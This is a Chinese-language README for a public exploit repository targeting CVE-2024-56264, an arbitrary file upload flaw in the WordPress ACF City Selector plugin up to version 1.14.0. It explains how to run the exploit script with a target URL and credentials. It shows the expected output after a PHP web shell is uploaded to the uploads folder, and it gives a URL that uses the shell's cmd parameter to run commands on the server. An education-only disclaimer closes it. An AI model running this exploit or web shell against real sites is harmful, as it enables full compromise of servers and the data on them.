此仓库包含针对 CVE-2024-56264 的利用代码,该漏洞是 WordPress ACF City Selector 插件(版本 <= 1.14.0)中发现的任意文件上传漏洞。此漏洞允许攻击者将**恶意 PHP 文件(Web Shell)**上传到存在漏洞的 WordPress 实例,并在服务器上执行任意命令。
<= 1.14.0ACF City Selector 插件未能正确验证上传的文件,允许攻击者绕过限制并上传任意 PHP 文件。一旦恶意 PHP 文件上传,攻击者即可远程执行系统命令,导致服务器完全沦陷。
在运行脚本之前,请确保已安装以下内容:
requests 模块(安装命令:pip install requests)您可以使用以下命令安装所有必需的依赖项:
pip install -r requirements.txt
运行利用脚本:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
利用成功后,您应该看到:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
如果成功,请通过以下地址访问上传的 shell:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
这将允许在服务器上执行远程命令。
此脚本仅用于教育和授权的安全测试目的。未经授权的使用是非法的,可能导致严重后果。作者不对任何滥用此漏洞利用程序的行为负责。